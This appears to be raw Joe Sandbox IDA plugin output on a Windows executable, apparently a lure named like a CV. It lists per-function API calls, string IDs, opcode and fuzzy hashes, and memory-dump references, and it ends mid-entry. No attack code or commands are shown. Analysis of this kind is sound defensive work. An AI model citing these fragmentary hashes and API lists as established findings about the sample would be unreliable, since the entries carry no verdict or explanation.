                                                                                            • Opcode Fuzzy Hash: f02c18b04b00e65672891b749a40b5c35f36f6948d9ea6c8364fe993714438cc
                                                                                            • Instruction Fuzzy Hash: 8F61A2B590024AAFDF11CFA8DCC4AAE7BB9FB45304F140459FA81A72A1D7B0AD45CB60
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00129C98
                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00129C9B
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00129CBF
                                                                                            • _memset.LIBCMT ref: 00129CD0
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00129CE2
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00129D5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                            • String ID:
                                                                                            • API String ID: 830647256-0
                                                                                            • Opcode ID: 0a59fd2cd665874f163e90d088c9b31c85bf845046f3028d1675f136778af608
                                                                                            • Instruction ID: 082d7a3bf9807378f7372d8a49406b5937104503e07b8a69e5124697f3fcffbe
                                                                                            • Opcode Fuzzy Hash: 0a59fd2cd665874f163e90d088c9b31c85bf845046f3028d1675f136778af608
                                                                                            • Instruction Fuzzy Hash: 8361AE75900218AFDB10DFA8DC81EEE77B8EF09714F14415AFA04E72A1D770AE52DB50
                                                                                            APIs
                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000F94FE
                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 000F9549
                                                                                            • VariantInit.OLEAUT32(?), ref: 000F955B
                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 000F957B
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 000F95BE
                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 000F95D2
                                                                                            • VariantClear.OLEAUT32(?), ref: 000F95E7
                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 000F95F4
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F95FD
                                                                                            • VariantClear.OLEAUT32(?), ref: 000F960F
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000F961A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                            • String ID:
                                                                                            • API String ID: 2706829360-0
                                                                                            • Opcode ID: 145f5755187a2082c9346318c2d4b8c11102e644913cec15d3be13515dcc7a85
                                                                                            • Instruction ID: 418d042f5c8f6339c2914de0d21861bf9c385476d7dc2ba56f31b540dfe857cf
                                                                                            • Opcode Fuzzy Hash: 145f5755187a2082c9346318c2d4b8c11102e644913cec15d3be13515dcc7a85
                                                                                            • Instruction Fuzzy Hash: 85412F35A0021DAFCF01DFA4D848AEEBB79FF08754F048065E511A7661DB31EA85DBA0
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CoInitialize.OLE32 ref: 0011ADF6
                                                                                            • CoUninitialize.OLE32 ref: 0011AE01
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,0014D8FC,?), ref: 0011AE61
                                                                                            • IIDFromString.OLE32(?,?), ref: 0011AED4
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011AF6E
                                                                                            • VariantClear.OLEAUT32(?), ref: 0011AFCF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                            • API String ID: 834269672-1287834457
                                                                                            • Opcode ID: 2abe75b7730629b3acd478ce9bf6e71e7f12633f73fec79630ebe3aa5357fafe
                                                                                            • Instruction ID: dd542faa17174ee74154959122766987923891a946eaf96eb3592b314c093711
                                                                                            • Opcode Fuzzy Hash: 2abe75b7730629b3acd478ce9bf6e71e7f12633f73fec79630ebe3aa5357fafe
                                                                                            • Instruction Fuzzy Hash: 9F61A1702093129FD718DF64D848BAEBBE8AF49714F50442DF9859B2A2C770ED85CB93
                                                                                            APIs
                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00118168
                                                                                            • inet_addr.WSOCK32(?), ref: 001181AD
                                                                                            • gethostbyname.WSOCK32(?), ref: 001181B9
                                                                                            • IcmpCreateFile.IPHLPAPI ref: 001181C7
                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00118237
                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0011824D
                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001182C2
                                                                                            • WSACleanup.WSOCK32 ref: 001182C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                            • String ID: Ping
                                                                                            • API String ID: 1028309954-2246546115
                                                                                            • Opcode ID: b103de30bf46e7032c4037de63da4aef535eddeb5bb68cb192e87b52f151d45c
                                                                                            • Instruction ID: 3a4f5eb803ed2a1fcaeb57068bcb8cf2a8f9ed30e9488568540667b54fcee858
                                                                                            • Opcode Fuzzy Hash: b103de30bf46e7032c4037de63da4aef535eddeb5bb68cb192e87b52f151d45c
                                                                                            • Instruction Fuzzy Hash: CE51B235604700AFDB15AF64DC45BAABBE4FF49710F04892AF955DB2E1DB70E880CB51
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010E396
                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0010E40C
                                                                                            • GetLastError.KERNEL32 ref: 0010E416
                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0010E483
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                            • API String ID: 4194297153-14809454
                                                                                            • Opcode ID: 8d3f72db4a36fcb2f8fe583b60b9ac6dd9eb28252eb9f4347844be53a0511669
                                                                                            • Instruction ID: b37637e2d5e1893768d222eb20172566fa78989c89fb7c7946573970f9e9ac7d
                                                                                            • Opcode Fuzzy Hash: 8d3f72db4a36fcb2f8fe583b60b9ac6dd9eb28252eb9f4347844be53a0511669
                                                                                            • Instruction Fuzzy Hash: 2E319235A002099FDB01EFA5D845FADB7F4EF48300F14841AE545EB2D2DBB0AA41DB91
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000FB98C
                                                                                            • GetDlgCtrlID.USER32 ref: 000FB997
                                                                                            • GetParent.USER32 ref: 000FB9B3
                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000FB9B6
                                                                                            • GetDlgCtrlID.USER32(?), ref: 000FB9BF
                                                                                            • GetParent.USER32(?), ref: 000FB9DB
                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000FB9DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CtrlParent
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 1383977212-1403004172
                                                                                            • Opcode ID: e021fe9c3dde33a0891893320d4203fff3ca03b02e707fee3d81ff596532cc8a
                                                                                            • Instruction ID: be03a79eae6ad0e1c1c7c0def87a6128100f61940fe2b6588038cb0b16106cf0
                                                                                            • Opcode Fuzzy Hash: e021fe9c3dde33a0891893320d4203fff3ca03b02e707fee3d81ff596532cc8a
                                                                                            • Instruction Fuzzy Hash: 6B21A474A00108AFDF04EBA4DC85EFEB7B5EB46310F10411AF655936A2DBB45855AB20
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000FBA73
                                                                                            • GetDlgCtrlID.USER32 ref: 000FBA7E
                                                                                            • GetParent.USER32 ref: 000FBA9A
                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 000FBA9D
                                                                                            • GetDlgCtrlID.USER32(?), ref: 000FBAA6
                                                                                            • GetParent.USER32(?), ref: 000FBAC2
                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000FBAC5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CtrlParent
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 1383977212-1403004172
                                                                                            • Opcode ID: bb2b675df33b824bdb1613c80d30eacba2a019eae39e99ba67f009f2a79154b1
                                                                                            • Instruction ID: 8a626b46afe976056358ee5b279b04ba4df7b1a1547c3cd798d1bd6c266fc49c
                                                                                            • Opcode Fuzzy Hash: bb2b675df33b824bdb1613c80d30eacba2a019eae39e99ba67f009f2a79154b1
                                                                                            • Instruction Fuzzy Hash: 3921C5B4A00108BFDF01ABA4DC85FFEBBB5EF45300F14401AF655935A2DB759955AF20
                                                                                            APIs
                                                                                            • GetParent.USER32 ref: 000FBAE3
                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 000FBAF8
                                                                                            • _wcscmp.LIBCMT ref: 000FBB0A
                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000FBB85
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                            • API String ID: 1704125052-3381328864
                                                                                            • Opcode ID: eb68c7485443a0b8694dd196ce285bfab297d790680533cff72c9077584f4622
                                                                                            • Instruction ID: ae901616a895ed9df510155cc0153a6fa936857e592c97d204425fae12130b11
                                                                                            • Opcode Fuzzy Hash: eb68c7485443a0b8694dd196ce285bfab297d790680533cff72c9077584f4622
                                                                                            • Instruction Fuzzy Hash: 6E110A7A70834BFDFA206621EC06DF637AC9B11320B200021FB0CE5CD6FFE198916914
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011B2D5
                                                                                            • CoInitialize.OLE32(00000000), ref: 0011B302
                                                                                            • CoUninitialize.OLE32 ref: 0011B30C
                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0011B40C
                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0011B539
                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0011B56D
                                                                                            • CoGetObject.OLE32(?,00000000,0014D91C,?), ref: 0011B590
                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0011B5A3
                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0011B623
                                                                                            • VariantClear.OLEAUT32(0014D91C), ref: 0011B633
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2395222682-0
                                                                                            • Opcode ID: b938797705125f71dd103ec72ef4c365b7a706ce48f5791d644b16bc5396cff9
                                                                                            • Instruction ID: e09b1ba04d53156470392d41e9c8ea8aba2b9cc51bf5a8238ca8e5e137b6e8be
                                                                                            • Opcode Fuzzy Hash: b938797705125f71dd103ec72ef4c365b7a706ce48f5791d644b16bc5396cff9
                                                                                            • Instruction Fuzzy Hash: 12C12471608305AFC708DF64C884AABB7E9BF89308F00496DF58ADB261DB71ED45CB52
                                                                                            APIs
                                                                                            • __lock.LIBCMT ref: 000EACC1
                                                                                              • Part of subcall function 000E7CF4: __mtinitlocknum.LIBCMT ref: 000E7D06
                                                                                              • Part of subcall function 000E7CF4: EnterCriticalSection.KERNEL32(00000000,?,000E7ADD,0000000D), ref: 000E7D1F
                                                                                            • __calloc_crt.LIBCMT ref: 000EACD2
                                                                                              • Part of subcall function 000E6986: __calloc_impl.LIBCMT ref: 000E6995
                                                                                              • Part of subcall function 000E6986: Sleep.KERNEL32(00000000,000003BC,000DF507,?,0000000E), ref: 000E69AC
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 000EACED
                                                                                            • GetStartupInfoW.KERNEL32(?,00176E28,00000064,000E5E91,00176C70,00000014), ref: 000EAD46
                                                                                            • __calloc_crt.LIBCMT ref: 000EAD91
                                                                                            • GetFileType.KERNEL32(00000001), ref: 000EADD8
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000EAE11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                            • String ID:
                                                                                            • API String ID: 1426640281-0
                                                                                            • Opcode ID: 7e617b2a64fdad48ef99c1b14aa0889541064997f86bc3a8f75c059887e63954
                                                                                            • Instruction ID: 095d1edebc73192cb6b3e4965111a51080347a0a597c22e65d63d5bb4b3bc012
                                                                                            • Opcode Fuzzy Hash: 7e617b2a64fdad48ef99c1b14aa0889541064997f86bc3a8f75c059887e63954
                                                                                            • Instruction Fuzzy Hash: 4C81D571E057858FDB24CF69D8805ADBBF0AF0E324B24426DD4A6BB3D2C734A842CB51
                                                                                            APIs
                                                                                            • __swprintf.LIBCMT ref: 001067FD
                                                                                            • __swprintf.LIBCMT ref: 0010680A
                                                                                              • Part of subcall function 000E172B: __woutput_l.LIBCMT ref: 000E1784
                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00106834
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00106840
                                                                                            • LockResource.KERNEL32(00000000), ref: 0010684D
                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0010686D
                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 0010687F
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0010688E
                                                                                            • LockResource.KERNEL32(?), ref: 0010689A
                                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001068F9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                            • String ID:
                                                                                            • API String ID: 1433390588-0
                                                                                            • Opcode ID: 5cd89bb4e18a7a143cc8de37c10d4e863b6ac1237fdd1a93b5e83e829b2546ff
                                                                                            • Instruction ID: e038eed20f887624cbeed4be8c09ece5d747020377688b27c27f42e6f428a108
                                                                                            • Opcode Fuzzy Hash: 5cd89bb4e18a7a143cc8de37c10d4e863b6ac1237fdd1a93b5e83e829b2546ff
                                                                                            • Instruction Fuzzy Hash: 17318F75A0021AAFDB109F61ED55EBE7BACEF09340B008426F942A2590E7B4DA61DB60
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00104047
                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001030A5,?,00000001), ref: 0010405B
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00104062
                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001030A5,?,00000001), ref: 00104071
                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00104083
                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001030A5,?,00000001), ref: 0010409C
                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001030A5,?,00000001), ref: 001040AE
                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001030A5,?,00000001), ref: 001040F3
                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001030A5,?,00000001), ref: 00104108
                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001030A5,?,00000001), ref: 00104113
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                            • String ID:
                                                                                            • API String ID: 2156557900-0
                                                                                            • Opcode ID: 6a93f432e045d8d1720a6927924db83addabf75462db08f342a875420e90296d
                                                                                            • Instruction ID: 50f4cae0fcbd2dba17fab38028312f5076a822f5537c64600ebf04dd420c05bc
                                                                                            • Opcode Fuzzy Hash: 6a93f432e045d8d1720a6927924db83addabf75462db08f342a875420e90296d
                                                                                            • Instruction Fuzzy Hash: 7931F2B5500200BFDB20CF14ECC5BA977AABB90711F158116FA44E66E0CBF4EEC08B64
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 000DB496
                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 000DB4A0
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 000DB4B5
                                                                                            • GetStockObject.GDI32(00000005), ref: 000DB4BD
                                                                                            • GetClientRect.USER32(?), ref: 0013DD63
                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0013DD7A
                                                                                            • GetWindowDC.USER32(?), ref: 0013DD86
                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0013DD95
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0013DDA7
                                                                                            • GetSysColor.USER32(00000005), ref: 0013DDC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3430376129-0
                                                                                            • Opcode ID: fc96f0b500e2607bdb6ed9bfc6c6a0a86757fd966aaffc6835f330af188e49e4
                                                                                            • Instruction ID: b10ffe14b082540b419076db5695148ddecbb4b2874ee21b8568c2821bb4da0a
                                                                                            • Opcode Fuzzy Hash: fc96f0b500e2607bdb6ed9bfc6c6a0a86757fd966aaffc6835f330af188e49e4
                                                                                            • Instruction Fuzzy Hash: 69117979100205EFDF216FB4FC08BA93BB1EB0A721F118221FA66995F2CB310981DB21
                                                                                            APIs
                                                                                            • EnumChildWindows.USER32(?,000FCF50), ref: 000FCE90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
